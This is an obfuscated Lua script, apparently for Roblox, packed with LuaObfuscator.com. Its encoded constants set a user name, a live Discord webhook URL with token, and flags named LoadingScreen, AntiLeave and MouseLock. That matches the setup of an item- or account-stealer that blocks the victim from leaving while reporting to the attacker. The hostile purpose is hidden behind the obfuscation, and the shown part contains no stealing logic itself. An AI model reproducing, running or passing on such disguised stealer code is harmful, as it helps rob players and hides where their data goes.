--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.12) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v82=(1637 -(1523 + 114)) -0 ;local v83;while true do if (0==v82) then v83=(v31/((5 -3)^(v32-1)))%((3 -(1 + 0))^(((v33-(2 -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + 74)))) ;return v83-(v83%((810 -241) -(367 + 201))) ;end end else local v84=(929 -((1279 -(68 + 997)) + 713))^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and (1 + 0)) or (877 -(282 + 595)) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (1273 -(226 + 1044)) );v19=v19 + (17 -13) ;return (v37 * (16777333 -(32 + (1042 -(892 + 65))))) + (v36 * (64226 + 1310)) + (v35 * (57 + 199)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 + 0 ;local v39;local v40;local v41;local v42;local v43;local v44;local v45;while true do if (v38~=(3 -2)) then else v41=nil;v42=nil;v38=6 -4 ;end if (v38==(4 -2)) then v43=nil;v44=nil;v38=3 -0 ;end if (v38==(3 + 0)) then v45=nil;while true do local v88=0;while true do if (v88==(3 -2)) then if (v39~=2) then else local v97=0 -0 ;local v98;while true do if (v97~=(0 + 0)) then else v98=0 -0 ;while true do local v111=0 -0 ;while true do if (v111==(1413 -(447 + 966))) then if (v98==(0 -0)) then for v119=1818 -(1703 + 114) ,v24() do local v120=0;local v121;while true do if (v120==(701 -(376 + 325))) then v121=v22();if (v21(v121,1 + 0 ,1 -0 )==0) then local v127=0 -0 ;local v128;local v129;local v130;local v131;while true do if (v127~=2) then else while true do if (v128~=(5 -3)) then else if (v21(v130,1 + 0 ,1)~=(1 + 0)) then else v131[1638 -(1373 + 263) ]=v45[v131[1002 -(451 + 549) ]];end if (v21(v130,1 + 1 ,4 -2 )==1) then v131[17 -(9 + 5) ]=v45[v131[3]];end v128=3;end if (v128==(376 -(85 + 291))) then local v133=1265 -(243 + 1022) ;local v134;while true do if (v133~=(0 -0)) then else v134=0;while true do if (v134==(0 + 0)) then v129=v21(v121,2 -0 ,1183 -(1123 + 57) );v130=v21(v121,4 + 0 ,6);v134=1;end if (v134~=1) then else v128=1 -0 ;break;end end break;end end end if (v128==(344 -(218 + 123))) then if (v21(v130,257 -(163 + 91) ,3)==(1931 -(1869 + 61))) then v131[1585 -(1535 + 46) ]=v45[v131[2 + 2 ]];end v40[v119]=v131;break;end if (v128==(1 + 0)) then v131={v23(),v23(),nil,nil};if (v129==0) then local v142=0;local v143;local v144;while true do if (v142~=(0 -0)) then else v143=0 + 0 ;v144=nil;v142=1 + 0 ;end if ((1 -0)==v142) then while true do if (v143==(0 + 0)) then v144=1474 -(1329 + 145) ;while true do if (v144~=(971 -(140 + 831))) then else v131[1853 -(1409 + 441) ]=v23();v131[9 -5 ]=v23();break;end end break;end end break;end end elseif (v129==(604 -(268 + 335))) then v131[293 -(60 + 230) ]=v24();elseif (v129==(720 -(15 + 703))) then v131[2 + 1 ]=v24() -(2^16) ;elseif (v129==(441 -(262 + 176))) then local v147=1721 -(345 + 1376) ;local v148;local v149;local v150;while true do if (v147~=(689 -(198 + 490))) then else v150=nil;while true do if (1==v148) then while true do if (v149==0) then v150=0 -0 ;while true do if (v150==(0 -0)) then v131[1209 -(696 + 510) ]=v24() -((813 -(569 + 242))^(46 -30)) ;v131[7 -3 ]=v23();break;end end break;end end break;end if (v148==0) then v149=0;v150=nil;v148=1;end end break;end if (v147==0) then v148=1262 -(1091 + 171) ;v149=nil;v147=1 + 0 ;end end end v128=1026 -(706 + 318) ;end end break;end if (v127==(1251 -(721 + 530))) then v128=0;v129=nil;v127=1;end if (v127==(1 + 0)) then local v132=1271 -(945 + 326) ;while true do if (v132~=(0 -0)) then else v130=nil;v131=nil;v132=3 -2 ;end if (v132==(375 -(123 + 251))) then v127=9 -7 ;break;end end end end end break;end end end for v122=1 + 0 ,v24() do v41[v122-(699 -(208 + 490)) ]=v29();end v98=1 + 0 ;end if (v98==(1 + 0)) then return v43;end break;end end end break;end end end break;end if (v88~=(836 -(660 + 176))) then else if (v39~=(0 + 0)) then else local v99=202 -(14 + 188) ;while true do if (v99==(675 -(534 + 141))) then v40={};v41={};v99=1;end if (2==v99) then v39=1;break;end if (v99~=(1 + 0)) then else v42={};v43={v40,v41,nil,v42};v99=2;end end end if (v39==(1501 -(1408 + 92))) then local v100=0 -0 ;while true do if (v100==2) then v39=5 -3 ;break;end if ((1 + 0)==v100) then for v112=1 + 0 ,v44 do local v113=396 -(115 + 281) ;local v114;local v115;local v116;while true do if (v113==1) then v116=nil;while true do if ((2 -1)==v114) then if (v115==(1 + 0)) then v116=v22()~=(0 -0) ;elseif (v115==(1 + 1)) then v116=v25();elseif (v115~=3) then else v116=v26();end v45[v112]=v116;break;end if (v114==(1171 -(418 + 753))) then local v125=0 -0 ;local v126;while true do if (v125==(0 + 0)) then v126=0;while true do if (v126~=(868 -(550 + 317))) then else v114=1;break;end if (v126~=0) then else v115=v22();v116=nil;v126=1 + 0 ;end end break;end end end end break;end if (v113~=(0 + 0)) then else local v118=0 -0 ;while true do if (v118~=0) then else v114=0;v115=nil;v118=1;end if (v118==(1 -0)) then v113=2 -1 ;break;end end end end end v43[288 -(134 + 151) ]=v22();v100=1771 -(1749 + 20) ;end if (v100~=(0 + 0)) then else v44=v24();v45={};v100=1323 -(1249 + 73) ;end end end v88=1;end end end break;end if (v38~=(0 + 0)) then else v39=0;v40=nil;v38=1666 -(970 + 695) ;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v46=1145 -((1678 -(323 + 889)) + 679) ;local v47;local v48;local v49;local v50;local v51;local v52;while true do if ((4 -2)==v46) then v51=v21(v48,60 -39 ,1931 -(106 + 1794) );v52=((v21(v48,11 + 21 )==(2 -1)) and  -1) or (1 + (580 -(361 + 219))) ;v46=8 -5 ;end if (v46==((322 -(53 + 267)) -(1 + 0))) then v49=115 -(4 + (523 -(15 + 398))) ;v50=(v21(v48,585 -(57 + 527) ,1447 -(41 + 1386) ) * (2^(135 -(17 + 86)))) + v47 ;v46=2 + 0 ;end if (v46==(6 -3)) then if (v51==(0 -0)) then if (v50==(166 -(122 + 44))) then return v52 * 0 ;else v51=1 -0 ;v49=0;end elseif (v51==(6790 -4743)) then return ((v50==(0 + 0)) and (v52 * ((1 + 0)/(0 -0)))) or (v52 * NaN) ;end return v8(v52,v51-(1088 -(30 + (1017 -(18 + 964)))) ) * (v49 + (v50/((7 -5)^(36 + 16)))) ;end if (v46==(1257 -(1043 + 124 + 90))) then v47=v24();v48=v24();v46=3 -2 ;end end end v26=nil;function v26(v53)local v54;if  not v53 then v53=v24();if (v53==(0 + 0)) then return "";end end v54=v3(v16,v19,(v19 + v53) -(851 -(20 + 830)) );v19=v19 + v53 ;local v55={};for v66=1 + 0 , #v54 do v55[v66]=v2(v1(v3(v54,v66,v66)));end return v6(v55);end v18=5;end if (v18==2) then function v22()local v56=v1(v16,v19,v19);v19=v19 + 1 ;return v56;end v23=nil;function v23()local v57,v58=v1(v16,v19,v19 + (128 -(116 + 10)) );v19=v19 + 2 ;return (v58 * (19 + 237)) + v57 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59)if (v1(v59,2)==79) then v20=v0(v3(v59,1,1));return "";else local v85=v2(v0(v59,16));if v20 then local v89=0;local v90;while true do if (v89==0) then v90=v5(v85,v20);v20=nil;v89=1;end if (v89==1) then return v90;end end else return v85;end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v87=0;while true do if (v87==0) then v80=v68[v72];v81=v80[1];v87=1;end if (v87==1) then if (v81<=2) then if (v81<=0) then v78[v80[2]]=v80[3];elseif (v81>1) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else do return;end end elseif (v81<=4) then if (v81==3) then v62[v80[3]]=v78[v80[2]];else v72=v80[3];end elseif (v81>5) then v78[v80[2]][v80[3]]=v80[4];else v78[v80[2]]=v62[v80[3]];end v72=v72 + 1 ;break;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0D3O00028O0003083O00557365724E616D6503073O004A61797678667703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313332363032382O393733303533383532362F436154774C4457505A57656672456A46566C65503258334B5A7A3765796373644F36712O656F474146666547756E722D51454C4D797A716F30515235497151783732627A026O00F03F03093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O01027O004003093O00416E74694C6561766503093O004D6F7573654C6F636B00183O00124O00013O0026023O000800010001002O043O0008000100122O000100033O001203000100023O00122O000100053O001203000100043O00124O00063O0026023O000F00010006002O043O000F000100122O000100033O001203000100073O001205000100083O00300600010009000A00124O000B3O0026023O00010001000B002O043O00010001001205000100083O0030060001000C000A001205000100083O0030060001000D000A002O043O00170001002O043O000100012O00013O00017O00",v9(),...);
